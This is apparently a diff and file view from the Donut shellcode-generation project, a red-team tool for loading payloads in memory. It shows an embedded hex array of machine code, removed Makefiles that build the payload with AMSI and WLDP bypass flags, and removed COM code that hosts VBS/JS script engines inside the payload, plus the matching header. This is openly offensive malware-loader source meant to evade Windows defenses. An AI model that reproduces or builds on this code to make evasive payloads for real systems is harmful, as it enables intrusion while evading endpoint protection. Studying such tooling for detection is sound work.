769 0x42, 0xe9, 0xef, 0x00, 0x00, 0x00, 0x8b, 0x44, 0x24, 0x14, 0x8b, 0x54,
770 0x24, 0x18, 0x0f, 0xb6, 0x38, 0x40, 0x8b, 0xcf, 0x89, 0x44, 0x24, 0x14,
771 0x83, 0xe1, 0x01, 0x83, 0xc1, 0x02, 0xd1, 0xef, 0x74, 0x14, 0x8b, 0xf2,
772 0x2b, 0xf7, 0x8a, 0x06, 0x88, 0x02, 0x42, 0x46, 0x83, 0xe9, 0x01, 0x75,
773 0xf5, 0xe9, 0xa4, 0x00, 0x00, 0x00, 0x33, 0xdb, 0x43, 0x89, 0x5c, 0x24,
774 0x10, 0xe9, 0x9c, 0x00, 0x00, 0x00, 0xe8, 0xfc, 0x00, 0x00, 0x00, 0x8b,
775 0xd0, 0x59, 0x85, 0xf6, 0x75, 0x2b, 0x83, 0xfa, 0x02, 0x75, 0x26, 0x8d,
776 0x44, 0x24, 0x14, 0x50, 0xe8, 0xe6, 0x00, 0x00, 0x00, 0x8b, 0x54, 0x24,
777 0x1c, 0x8b, 0xf0, 0x59, 0x85, 0xf6, 0x74, 0x76, 0x8b, 0xca, 0x2b, 0xcf,
778 0x8a, 0x01, 0x88, 0x02, 0x42, 0x41, 0x83, 0xee, 0x01, 0x75, 0xf5, 0xeb,
779 0x61, 0x8b, 0x4c, 0x24, 0x14, 0x8d, 0x44, 0x24, 0x14, 0x83, 0xf6, 0x01,
780 0x2b, 0xd6, 0xc1, 0xe2, 0x08, 0x0f, 0xb6, 0x39, 0x81, 0xc7, 0x00, 0xfe,
781 0xff, 0xff, 0x03, 0xfa, 0x41, 0x50, 0x89, 0x4c, 0x24, 0x18, 0xe8, 0xa4,
782 0x00, 0x00, 0x00, 0x59, 0x8b, 0xc8, 0x81, 0xff, 0x00, 0x7d, 0x00, 0x00,
783 0x72, 0x01, 0x41, 0x8b, 0x54, 0x24, 0x18, 0x8d, 0x41, 0x01, 0x81, 0xff,
784 0x00, 0x05, 0x00, 0x00, 0x0f, 0x42, 0xc1, 0x81, 0xff, 0x80, 0x00, 0x00,
785 0x00, 0x8d, 0x70, 0x02, 0x0f, 0x43, 0xf0, 0x85, 0xf6, 0x74, 0x13, 0x8b,
786 0xca, 0x2b, 0xcf, 0x8a, 0x01, 0x88, 0x02, 0x42, 0x41, 0x83, 0xee, 0x01,
787 0x75, 0xf5, 0x89, 0x54, 0x24, 0x18, 0x33, 0xf6, 0x46, 0xeb, 0x18, 0x8b,
788 0x4c, 0x24, 0x14, 0x8b, 0x54, 0x24, 0x18, 0x8a, 0x01, 0x88, 0x02, 0x42,
789 0x41, 0x89, 0x4c, 0x24, 0x14, 0x33, 0xf6, 0x89, 0x54, 0x24, 0x18, 0x85,
790 0xdb, 0x0f, 0x84, 0x9b, 0xfe, 0xff, 0xff, 0x5f, 0x5e, 0x2b, 0xd5, 0x5d,
791 0x8b, 0xc2, 0x5b, 0x83, 0xc4, 0x14, 0xc3, 0x8b, 0x54, 0x24, 0x04, 0x8b,
792 0x4a, 0x0c, 0x8d, 0x41, 0xff, 0x89, 0x42, 0x0c, 0x85, 0xc9, 0x75, 0x13,
793 0x8b, 0x02, 0x8a, 0x08, 0x40, 0x89, 0x02, 0xc7, 0x42, 0x0c, 0x07, 0x00,
794 0x00, 0x00, 0x0f, 0xb6, 0xc1, 0xeb, 0x03, 0x8b, 0x42, 0x08, 0x8d, 0x0c,
795 0x00, 0xc1, 0xe8, 0x07, 0x89, 0x4a, 0x08, 0x83, 0xe0, 0x01, 0xc3, 0x56,
796 0x33, 0xf6, 0x46, 0xff, 0x74, 0x24, 0x08, 0xe8, 0xbf, 0xff, 0xff, 0xff,
797 0xff, 0x74, 0x24, 0x0c, 0x8d, 0x34, 0x70, 0xe8, 0xb3, 0xff, 0xff, 0xff,
798 0x59, 0x59, 0x85, 0xc0, 0x75, 0xe5, 0x8b, 0xc6, 0x5e, 0xc3, 0x8b, 0x54,
799 0x24, 0x0c, 0x8b, 0x44, 0x24, 0x04, 0x56, 0x8b, 0xf0, 0x85, 0xd2, 0x74,
800 0x13, 0x57, 0x8b, 0x7c, 0x24, 0x10, 0x2b, 0xf8, 0x8a, 0x0c, 0x37, 0x88,
801 0x0e, 0x46, 0x83, 0xea, 0x01, 0x75, 0xf5, 0x5f, 0x5e, 0xc3, 0x8a, 0x44,
802 0x24, 0x08, 0x8b, 0x4c, 0x24, 0x0c, 0x57, 0x8b, 0x7c, 0x24, 0x08, 0xf3,
803 0xaa, 0x8b, 0x44, 0x24, 0x08, 0x5f, 0xc3, 0x8b, 0x44, 0x24, 0x04, 0x8b,
804 0x4c, 0x24, 0x08, 0x53, 0x8a, 0x10, 0x84, 0xd2, 0x74, 0x0e, 0x8a, 0x19,
805 0x84, 0xdb, 0x74, 0x08, 0x3a, 0xd3, 0x75, 0x04, 0x40, 0x41, 0xeb, 0xec,
806 0x0f, 0xbe, 0x00, 0x0f, 0xbe, 0x09, 0x2b, 0xc1, 0x5b, 0xc3};
807
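--- a/payload/Makefile.mingw
+++ b/payload/Makefile.mingw
@@ -1,12 +0,0 @@
-x64:
-x86_64-w64-mingw32-gcc -DBYPASS_AMSI_A -DBYPASS_WLDP_A -fno-toplevel-reorder -fpack-struct=8 -fPIC -O0 -nostdlib payload.c clib.c ../hash.c ../encrypt.c -I ../include -opayload.exe
-exe2h/exe2h payload.exe
-x86:
-i686-w64-mingw32-gcc -DBYPASS_AMSI_A -DBYPASS_WLDP_A -fno-toplevel-reorder -fpack-struct=8 -fPIC -O0 -nostdlib payload.c clib.c ../hash.c ../encrypt.c -I ../include -opayload.exe
-exe2h/exe2h payload.exe
-debug_x64:
-x86_64-w64-mingw32-gcc -DCLIB -DBYPASS_AMSI_A -DBYPASS_WLDP_A -Wno-format -fpack-struct=8 -DDEBUG -I ../include payload.c ../hash.c ../encrypt.c clib.c -opayload.exe
-debug_x86:
-i686-w64-mingw32-gcc -DCLIB -DBYPASS_AMSI_A -DBYPASS_WLDP_A -Wno-format -fpack-struct=8 -DDEBUG -I ../include payload.c ../hash.c ../encrypt.c clib.c -opayload.exe
-clean:
-rm *.o payload.exe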
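--- a/payload/Makefile.msvc
+++ b/payload/Makefile.msvc
@@ -1,9 +0,0 @@
-payload:
-cl -DBYPASS_AMSI_A -DBYPASS_WLDP_A -Zp8 -c -nologo -Gy -Os -O1 -GR- -EHa -Oi -GS- -I ..\include payload.c ..\hash.c ..\encrypt.c clib.c
-link -nologo -order:@order.txt -entry:ThreadProc -fixed -subsystem:console -nodefaultlib payload.obj hash.obj encrypt.obj clib.obj
-exe2h\exe2h payload.exe
-debug:
-cl -DDEBUG -DBYPASS_AMSI_A -DBYPASS_WLDP_A -Zp8 -c -nologo -Gy -Os -EHa -GS- -I ..\include payload.c ..\hash.c ..\encrypt.c clib.c
-link -nologo -order:@order.txt -subsystem:console payload.obj hash.obj encrypt.obj clib.obj
-clean:
-del *.obj payload.exe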
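--- a/payload/activescript.c
+++ b/payload/activescript.c
@@ -1,186 +0,0 @@
-/**
-BSD 3-Clause License
-
-Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
-
-Redistribution and use in source and binary forms, with or without
-modification, are permitted provided that the following conditions are met:
-
-* Redistributions of source code must retain the above copyright notice, this
-list of conditions and the following disclaimer.
-
-* Redistributions in binary form must reproduce the above copyright notice,
-this list of conditions and the following disclaimer in the documentation
-and/or other materials provided with the distribution.
-
-* Neither the name of the copyright holder nor the names of its
-contributors may be used to endorse or promote products derived from
-this software without specific prior written permission.
-
-THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
-AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
-IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
-DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
-FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
-DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
-CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
-OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-*/
-
-// initialize virtual function table
-static VOID ActiveScript_New(PDONUT_INSTANCE inst, IActiveScriptSite *this) {
-MyIActiveScriptSite *mas = (MyIActiveScriptSite*)this;
-
-// Initialize IUnknown
-mas->site.lpVtbl->QueryInterface = ADR(LPVOID, ActiveScript_QueryInterface);
-mas->site.lpVtbl->AddRef = ADR(LPVOID, ActiveScript_AddRef);
-mas->site.lpVtbl->Release = ADR(LPVOID, ActiveScript_Release);
-
-// Initialize IActiveScriptSite
-mas->site.lpVtbl->GetLCID = ADR(LPVOID, ActiveScript_GetLCID);
-mas->site.lpVtbl->GetItemInfo = ADR(LPVOID, ActiveScript_GetItemInfo);
-mas->site.lpVtbl->GetDocVersionString = ADR(LPVOID, ActiveScript_GetDocVersionString);
-mas->site.lpVtbl->OnScriptTerminate = ADR(LPVOID, ActiveScript_OnScriptTerminate);
-mas->site.lpVtbl->OnStateChange = ADR(LPVOID, ActiveScript_OnStateChange);
-mas->site.lpVtbl->OnScriptError = ADR(LPVOID, ActiveScript_OnScriptError);
-mas->site.lpVtbl->OnEnterScript = ADR(LPVOID, ActiveScript_OnEnterScript);
-mas->site.lpVtbl->OnLeaveScript = ADR(LPVOID, ActiveScript_OnLeaveScript);
-
-mas->site.m_cRef = 0;
-mas->inst = inst;
-}
-
-static STDMETHODIMP ActiveScript_QueryInterface(IActiveScriptSite *this, REFIID riid, void **ppv) {
-MyIActiveScriptSite *mas = (MyIActiveScriptSite*)this;
-
-DPRINT("IActiveScriptSite::QueryInterface");
-
-if(ppv == NULL) return E_POINTER;
-
-// we implement the following interfaces
-if(IsEqualIID(&mas->inst->xIID_IUnknown, riid) ||
-IsEqualIID(&mas->inst->xIID_IActiveScriptSite, riid))
-{
-*ppv = (LPVOID)this;
-ActiveScript_AddRef(this);
-return S_OK;
-}
-*ppv = NULL;
-return E_NOINTERFACE;
-}
-
-static STDMETHODIMP_(ULONG) ActiveScript_AddRef(IActiveScriptSite *this) {
-MyIActiveScriptSite *mas = (MyIActiveScriptSite*)this;
-
-_InterlockedIncrement(&mas->site.m_cRef);
-
-DPRINT("IActiveScriptSite::AddRef : m_cRef : %i\n", mas->site.m_cRef);
-
-return mas->site.m_cRef;
-}
-
-static STDMETHODIMP_(ULONG) ActiveScript_Release(IActiveScriptSite *this) {
-MyIActiveScriptSite *mas = (MyIActiveScriptSite*)this;
-
-ULONG ulRefCount = _InterlockedDecrement(&mas->site.m_cRef);
-
-DPRINT("IActiveScriptSite::Release : m_cRef : %i\n", ulRefCount);
-return ulRefCount;
-}
-
-static STDMETHODIMP ActiveScript_GetItemInfo(IActiveScriptSite *this,
-LPCOLESTR objectName, DWORD dwReturnMask,
-IUnknown **objPtr, ITypeInfo **ppti)
-{
-MyIActiveScriptSite *mas = (MyIActiveScriptSite*)this;
-
-DPRINT("IActiveScriptSite::GetItemInfo");
-
-if(dwReturnMask & SCRIPTINFO_ITYPEINFO) {
-DPRINT("Caller is requesting SCRIPTINFO_ITYPEINFO.");
-if(ppti == NULL) return E_POINTER;
-
-mas->wscript.lpTypeInfo->lpVtbl->AddRef(mas->wscript.lpTypeInfo);
-*ppti = mas->wscript.lpTypeInfo;
-}
-
-if(dwReturnMask & SCRIPTINFO_IUNKNOWN) {
-DPRINT("Caller is requesting SCRIPTINFO_IUNKNOWN.");
-if(objPtr == NULL) return E_POINTER;
-
-mas->wscript.lpVtbl->AddRef(&mas->wscript);
-*objPtr = (IUnknown*)&mas->wscript;
-}
-
-return S_OK;
-}
-
-static STDMETHODIMP ActiveScript_OnScriptError(IActiveScriptSite *this,
-IActiveScriptError *scriptError)
-{
-DPRINT("IActiveScriptSite::OnScriptError");
-
-EXCEPINFO ei;
-DWORD dwSourceContext = 0;
-ULONG ulLineNumber = 0;
-LONG ichCharPosition = 0;
-HRESULT hr;
-
-Memset(&ei, 0, sizeof(EXCEPINFO));
-
-DPRINT("IActiveScriptError::GetExceptionInfo");
-hr = scriptError->lpVtbl->GetExceptionInfo(scriptError, &ei);
-if(hr == S_OK) {
-DPRINT("IActiveScriptError::GetSourcePosition");
-hr = scriptError->lpVtbl->GetSourcePosition(
-scriptError, &dwSourceContext,
-&ulLineNumber, &ichCharPosition);
-if(hr == S_OK) {
-DPRINT("JSError: %ws line[%d:%d]\n",
-ei.bstrDescription, ulLineNumber, ichCharPosition);
-}
-}
-return S_OK;
-}
-
-static STDMETHODIMP ActiveScript_GetLCID(IActiveScriptSite *this, LCID *plcid) {
-DPRINT("IActiveScriptSite::GetLCID");
-MyIActiveScriptSite *mas = (MyIActiveScriptSite*)this;
-
-*plcid = mas->inst->api.GetUserDefaultLCID();
-return S_OK;
-}
-
-static STDMETHODIMP ActiveScript_GetDocVersionString(IActiveScriptSite *this, BSTR *version) {
-DPRINT("IActiveScriptSite::GetDocVersionString");
-
-return S_OK;
-}
-
-static STDMETHODIMP ActiveScript_OnScriptTerminate(IActiveScriptSite *this,
-const VARIANT *pvr, const EXCEPINFO *pei)
-{
-DPRINT("IActiveScriptSite::OnScriptTerminate");
-
-return S_OK;
-}
-
-static STDMETHODIMP ActiveScript_OnStateChange(IActiveScriptSite *this, SCRIPTSTATE state) {
-DPRINT("IActiveScriptSite::OnStateChange");
-
-return S_OK;
-}
-
-static STDMETHODIMP ActiveScript_OnEnterScript(IActiveScriptSite *this) {
-DPRINT("IActiveScriptSite::OnEnterScript");
-
-return S_OK;
-}
-
-static STDMETHODIMP ActiveScript_OnLeaveScript(IActiveScriptSite *this) {
-DPRINT("IActiveScriptSite::OnLeaveScript");
-
-return S_OK;
-}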
+0
-436
payload/activescript.h less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #ifndef IACTIVESCRIPT_H
32 #define IACTIVESCRIPT_H
33
34 #include "../include/donut.h"
35
36 // required to load and run VBS or JS files
37 typedef struct _IActiveScript IActiveScript;
38 typedef struct _IActiveScriptError IActiveScriptError;
39 typedef struct _IActiveScriptSite IActiveScriptSite;
40 typedef struct _IActiveScriptSiteWindow IActiveScriptSiteWindow;
41 typedef struct _IActiveScriptParse32 IActiveScriptParse32;
42 typedef struct _IActiveScriptParse64 IActiveScriptParse64;
43
44 typedef enum tagSCRIPTSTATE {
45 SCRIPTSTATE_UNINITIALIZED = 0,
46 SCRIPTSTATE_STARTED = 1,
47 SCRIPTSTATE_CONNECTED = 2,
48 SCRIPTSTATE_DISCONNECTED = 3,
49 SCRIPTSTATE_CLOSED = 4,
50 SCRIPTSTATE_INITIALIZED = 5
51 } SCRIPTSTATE;
52
53 typedef enum tagSCRIPTTHREADSTATE {
54 SCRIPTTHREADSTATE_NOTINSCRIPT = 0,
55 SCRIPTTHREADSTATE_RUNNING = 1
56 } SCRIPTTHREADSTATE;
57
58 #define SCRIPTTHREADID_CURRENT 0xFFFFFFFD // The currently executing thread.
59 #define SCRIPTTHREADID_BASE 0xFFFFFFFE // The base thread; that is, the thread in which the scripting engine was instantiated.
60 #define SCRIPTTHREADID_ALL 0xFFFFFFFF // All threads.
61
62 typedef DWORD SCRIPTTHREADID;
63
64 #define SCRIPTITEM_ISPERSISTENT 0x00000001
65 #define SCRIPTITEM_ISVISIBLE 0x00000002
66 #define SCRIPTITEM_ISSOURCE 0x00000004
67 #define SCRIPTITEM_GLOBALMEMBERS 0x00000008
68 #define SCRIPTITEM_EXISTS 0x00000080
69 #define SCRIPTITEM_MULTIINSTANCE 0x00000100
70 #define SCRIPTITEM_CODEONLY 0x00000200
71
72 #define SCRIPTTEXT_ISPERSISTENT 0x00000001
73 #define SCRIPTTEXT_ISVISIBLE 0x00000002
74 #define SCRIPTTEXT_ISEXPRESSION 0x00000020
75 #define SCRIPTTEXT_KEEPDEFINITIONS 0x00000040
76 #define SCRIPTTEXT_ALLOWEXECUTION 0x00000400
77 #define SCRIPTTEXT_ALL_FLAGS (SCRIPTTEXT_ISPERSISTENT | \
78 SCRIPTTEXT_ISVISIBLE | \
79 SCRIPTTEXT_ISEXPRESSION | \
80 SCRIPTTEXT_KEEPDEFINITIONS | \
81 SCRIPTTEXT_ALLOWEXECUTION)
82
83 #define SCRIPTTEXT_HOSTMANAGESSOURCE 0x00000080
84 #define SCRIPTINFO_IUNKNOWN 0x00000001
85 #define SCRIPTINFO_ITYPEINFO 0x00000002
86 #define SCRIPTINFO_ALL_FLAGS (SCRIPTINFO_IUNKNOWN | SCRIPTINFO_ITYPEINFO)
87
88 typedef struct IActiveScriptVtbl {
89 BEGIN_INTERFACE
90
91 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
92 IActiveScript * This,
93 /* [in] */ REFIID riid,
94 /* [annotation][iid_is][out] */
95 void **ppvObject);
96
97 ULONG ( STDMETHODCALLTYPE *AddRef )(
98 IActiveScript * This);
99
100 ULONG ( STDMETHODCALLTYPE *Release )(
101 IActiveScript * This);
102
103 HRESULT ( STDMETHODCALLTYPE *SetScriptSite )(
104 IActiveScript * This,
105 /* [in] */ IActiveScriptSite *pass);
106
107 HRESULT ( STDMETHODCALLTYPE *GetScriptSite )(
108 IActiveScript * This,
109 /* [in] */ REFIID riid,
110 /* [iid_is][out] */ void **ppvObject);
111
112 HRESULT ( STDMETHODCALLTYPE *SetScriptState )(
113 IActiveScript * This,
114 /* [in] */ SCRIPTSTATE ss);
115
116 HRESULT ( STDMETHODCALLTYPE *GetScriptState )(
117 IActiveScript * This,
118 /* [out] */ SCRIPTSTATE *pssState);
119
120 HRESULT ( STDMETHODCALLTYPE *Close )(
121 IActiveScript * This);
122
123 HRESULT ( STDMETHODCALLTYPE *AddNamedItem )(
124 IActiveScript * This,
125 /* [in] */ LPCOLESTR pstrName,
126 /* [in] */ DWORD dwFlags);
127
128 HRESULT ( STDMETHODCALLTYPE *AddTypeLib )(
129 IActiveScript * This,
130 /* [in] */ REFGUID rguidTypeLib,
131 /* [in] */ DWORD dwMajor,
132 /* [in] */ DWORD dwMinor,
133 /* [in] */ DWORD dwFlags);
134
135 HRESULT ( STDMETHODCALLTYPE *GetScriptDispatch )(
136 IActiveScript * This,
137 /* [in] */ LPCOLESTR pstrItemName,
138 /* [out] */ IDispatch **ppdisp);
139
140 HRESULT ( STDMETHODCALLTYPE *GetCurrentScriptThreadID )(
141 IActiveScript * This,
142 /* [out] */ SCRIPTTHREADID *pstidThread);
143
144 HRESULT ( STDMETHODCALLTYPE *GetScriptThreadID )(
145 IActiveScript * This,
146 /* [in] */ DWORD dwWin32ThreadId,
147 /* [out] */ SCRIPTTHREADID *pstidThread);
148
149 HRESULT ( STDMETHODCALLTYPE *GetScriptThreadState )(
150 IActiveScript * This,
151 /* [in] */ SCRIPTTHREADID stidThread,
152 /* [out] */ SCRIPTTHREADSTATE *pstsState);
153
154 HRESULT ( STDMETHODCALLTYPE *InterruptScriptThread )(
155 IActiveScript * This,
156 /* [in] */ SCRIPTTHREADID stidThread,
157 /* [in] */ const EXCEPINFO *pexcepinfo,
158 /* [in] */ DWORD dwFlags);
159
160 HRESULT ( STDMETHODCALLTYPE *Clone )(
161 IActiveScript * This,
162 /* [out] */ IActiveScript **ppscript);
163
164 END_INTERFACE
165 } IActiveScriptVtbl;
166
167 typedef struct _IActiveScript {
168 IActiveScriptVtbl *lpVtbl;
169 } ActiveScript;
170
171 typedef struct IActiveScriptParse32Vtbl {
172 BEGIN_INTERFACE
173
174 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
175 IActiveScriptParse32 * This,
176 /* [in] */ REFIID riid,
177 /* [annotation][iid_is][out] */
178 void **ppvObject);
179
180 ULONG ( STDMETHODCALLTYPE *AddRef )(
181 IActiveScriptParse32 * This);
182
183 ULONG ( STDMETHODCALLTYPE *Release )(
184 IActiveScriptParse32 * This);
185
186 HRESULT ( STDMETHODCALLTYPE *InitNew )(
187 IActiveScriptParse32 * This);
188
189 HRESULT ( STDMETHODCALLTYPE *AddScriptlet )(
190 IActiveScriptParse32 * This,
191 /* [in] */ LPCOLESTR pstrDefaultName,
192 /* [in] */ LPCOLESTR pstrCode,
193 /* [in] */ LPCOLESTR pstrItemName,
194 /* [in] */ LPCOLESTR pstrSubItemName,
195 /* [in] */ LPCOLESTR pstrEventName,
196 /* [in] */ LPCOLESTR pstrDelimiter,
197 /* [in] */ DWORD dwSourceContextCookie,
198 /* [in] */ ULONG ulStartingLineNumber,
199 /* [in] */ DWORD dwFlags,
200 /* [out] */ BSTR *pbstrName,
201 /* [out] */ EXCEPINFO *pexcepinfo);
202
203 HRESULT ( STDMETHODCALLTYPE *ParseScriptText )(
204 IActiveScriptParse32 * This,
205 /* [in] */ LPCOLESTR pstrCode,
206 /* [in] */ LPCOLESTR pstrItemName,
207 /* [in] */ IUnknown *punkContext,
208 /* [in] */ LPCOLESTR pstrDelimiter,
209 /* [in] */ DWORD dwSourceContextCookie,
210 /* [in] */ ULONG ulStartingLineNumber,
211 /* [in] */ DWORD dwFlags,
212 /* [out] */ VARIANT *pvarResult,
213 /* [out] */ EXCEPINFO *pexcepinfo);
214
215 END_INTERFACE
216 } IActiveScriptParse32Vtbl;
217
218 typedef struct _IActiveScriptParse32 {
219 IActiveScriptParse32Vtbl *lpVtbl;
220 } ActiveScriptParse32;
221
222 typedef struct IActiveScriptParse64Vtbl {
223 BEGIN_INTERFACE
224
225 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
226 IActiveScriptParse64 * This,
227 /* [in] */ REFIID riid,
228 /* [annotation][iid_is][out] */
229 void **ppvObject);
230
231 ULONG ( STDMETHODCALLTYPE *AddRef )(
232 IActiveScriptParse64 * This);
233
234 ULONG ( STDMETHODCALLTYPE *Release )(
235 IActiveScriptParse64 * This);
236
237 HRESULT ( STDMETHODCALLTYPE *InitNew )(
238 IActiveScriptParse64 * This);
239
240 HRESULT ( STDMETHODCALLTYPE *AddScriptlet )(
241 IActiveScriptParse64 *This,
242 /* [in] */ LPCOLESTR pstrDefaultName,
243 /* [in] */ LPCOLESTR pstrCode,
244 /* [in] */ LPCOLESTR pstrItemName,
245 /* [in] */ LPCOLESTR pstrSubItemName,
246 /* [in] */ LPCOLESTR pstrEventName,
247 /* [in] */ LPCOLESTR pstrDelimiter,
248 /* [in] */ DWORDLONG dwSourceContextCookie,
249 /* [in] */ ULONG ulStartingLineNumber,
250 /* [in] */ DWORD dwFlags,
251 /* [out] */ BSTR *pbstrName,
252 /* [out] */ EXCEPINFO *pexcepinfo);
253
254 HRESULT ( STDMETHODCALLTYPE *ParseScriptText )(
255 IActiveScriptParse64 *This,
256 /* [in] */ LPCOLESTR pstrCode,
257 /* [in] */ LPCOLESTR pstrItemName,
258 /* [in] */ IUnknown *punkContext,
259 /* [in] */ LPCOLESTR pstrDelimiter,
260 /* [in] */ DWORDLONG dwSourceContextCookie,
261 /* [in] */ ULONG ulStartingLineNumber,
262 /* [in] */ DWORD dwFlags,
263 /* [out] */ VARIANT *pvarResult,
264 /* [out] */ EXCEPINFO *pexcepinfo);
265
266 END_INTERFACE
267 } IActiveScriptParse64Vtbl;
268
269 typedef struct _IActiveScriptParse64 {
270 IActiveScriptParse64Vtbl *lpVtbl;
271 } ActiveScriptParse64;
272
273 typedef struct _IActiveScriptSiteWindowVtbl {
274 BEGIN_INTERFACE
275
276 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
277 IActiveScriptSiteWindow * This,
278 /* [in] */ REFIID riid,
279 /* [annotation][iid_is][out] */
280 void **ppvObject);
281
282 ULONG ( STDMETHODCALLTYPE *AddRef )(
283 IActiveScriptSiteWindow * This);
284
285 ULONG ( STDMETHODCALLTYPE *Release )(
286 IActiveScriptSiteWindow * This);
287
288 HRESULT ( STDMETHODCALLTYPE *GetWindow )(
289 IActiveScriptSiteWindow * This,
290 /* [out] */ HWND *phwnd);
291
292 HRESULT ( STDMETHODCALLTYPE *EnableModeless )(
293 IActiveScriptSiteWindow * This,
294 /* [in] */ BOOL fEnable);
295
296 END_INTERFACE
297 } IActiveScriptSiteWindowVtbl;
298
299 typedef struct _IActiveScriptSiteWindow {
300 IActiveScriptSiteWindowVtbl *lpVtbl;
301 } ActiveScriptSiteWindow;
302
303 typedef struct _IActiveScriptErrorVtbl {
304 BEGIN_INTERFACE
305
306 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
307 IActiveScriptError * This,
308 /* [in] */ REFIID riid,
309 /* [annotation][iid_is][out] */
310 void **ppvObject);
311
312 ULONG ( STDMETHODCALLTYPE *AddRef )(
313 IActiveScriptError * This);
314
315 ULONG ( STDMETHODCALLTYPE *Release )(
316 IActiveScriptError * This);
317
318 /* [local] */ HRESULT ( STDMETHODCALLTYPE *GetExceptionInfo )(
319 IActiveScriptError * This,
320 /* [out] */ EXCEPINFO *pexcepinfo);
321
322 HRESULT ( STDMETHODCALLTYPE *GetSourcePosition )(
323 IActiveScriptError * This,
324 /* [out] */ DWORD *pdwSourceContext,
325 /* [out] */ ULONG *pulLineNumber,
326 /* [out] */ LONG *plCharacterPosition);
327
328 HRESULT ( STDMETHODCALLTYPE *GetSourceLineText )(
329 IActiveScriptError * This,
330 /* [out] */ BSTR *pbstrSourceLine);
331
332 END_INTERFACE
333 } IActiveScriptErrorVtbl;
334
335 typedef struct _IActiveScriptError {
336 IActiveScriptErrorVtbl *lpVtbl;
337 } ActiveScriptError;
338
339 typedef struct _IActiveScriptSiteVtbl {
340 BEGIN_INTERFACE
341
342 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
343 IActiveScriptSite * This,
344 /* [in] */ REFIID riid,
345 /* [annotation][iid_is][out] */
346 void **ppvObject);
347
348 ULONG ( STDMETHODCALLTYPE *AddRef )(
349 IActiveScriptSite * This);
350
351 ULONG ( STDMETHODCALLTYPE *Release )(
352 IActiveScriptSite * This);
353
354 HRESULT ( STDMETHODCALLTYPE *GetLCID )(
355 IActiveScriptSite * This,
356 /* [out] */ LCID *plcid);
357
358 HRESULT ( STDMETHODCALLTYPE *GetItemInfo )(
359 IActiveScriptSite * This,
360 /* [in] */ LPCOLESTR pstrName,
361 /* [in] */ DWORD dwReturnMask,
362 /* [out] */ IUnknown **ppiunkItem,
363 /* [out] */ ITypeInfo **ppti);
364
365 HRESULT ( STDMETHODCALLTYPE *GetDocVersionString )(
366 IActiveScriptSite * This,
367 /* [out] */ BSTR *pbstrVersion);
368
369 HRESULT ( STDMETHODCALLTYPE *OnScriptTerminate )(
370 IActiveScriptSite * This,
371 /* [in] */ const VARIANT *pvarResult,
372 /* [in] */ const EXCEPINFO *pexcepinfo);
373
374 HRESULT ( STDMETHODCALLTYPE *OnStateChange )(
375 IActiveScriptSite * This,
376 /* [in] */ SCRIPTSTATE ssScriptState);
377
378 HRESULT ( STDMETHODCALLTYPE *OnScriptError )(
379 IActiveScriptSite * This,
380 /* [in] */ IActiveScriptError *pscripterror);
381
382 HRESULT ( STDMETHODCALLTYPE *OnEnterScript )(
383 IActiveScriptSite * This);
384
385 HRESULT ( STDMETHODCALLTYPE *OnLeaveScript )(
386 IActiveScriptSite * This);
387
388 END_INTERFACE
389 } IActiveScriptSiteVtbl;
390
391 typedef struct _IActiveScriptSite {
392 IActiveScriptSiteVtbl *lpVtbl;
393 ULONG m_cRef; // reference count (not part of original definition of course)
394 } ActiveScriptSite;
395
396 #ifdef _WIN64
397 #define IActiveScriptParse IActiveScriptParse64
398 #define IID_IActiveScriptParse IID_IActiveScriptParse64
399 #else
400 #define IActiveScriptParse IActiveScriptParse32
401 #define IID_IActiveScriptParse IID_IActiveScriptParse32
402 #endif
403
404 static VOID ActiveScript_New(PDONUT_INSTANCE inst, IActiveScriptSite *this);
405
